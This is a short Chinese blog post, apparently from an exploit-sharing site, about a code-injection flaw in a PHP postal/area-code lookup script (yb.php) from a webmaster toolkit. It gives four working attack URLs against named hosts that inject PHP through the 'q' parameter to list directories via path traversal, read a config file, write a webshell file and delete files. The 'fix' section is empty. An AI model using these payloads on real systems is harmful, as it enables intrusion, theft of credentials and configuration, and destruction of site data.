站长工具之“邮编区号查询”高危安全漏洞

方法1、服务器上代码检查方法:

在服务器上找到并打开“邮编区号查询”的相关php文件代码(常用文件名为yb.php)如果存在如下代码:

#1打印目录及文件,可修改参数d的值扫描整站

http://tool.51cto.com/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../../

#2查看文件,可修改参数d的值查看整站文件

http://tool.0day5.com/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../../admin.0day5.com/tool/config.php

#3写入传说中的webshell,参数d为内容,n为文件名

利用:
http://tool.0day5.com/yb/yb.php?q=${@exit(var_dump(file_put_contents($_GET[n],$_GET[d])))}&d=by:0day5.com&n=./../1.txt

对应文件地址:
http://tool.0day5.com/1.txt

#4删除文件,参数n为文件名

http://tool.0day5.com//yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../1.txt

修补方法:

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录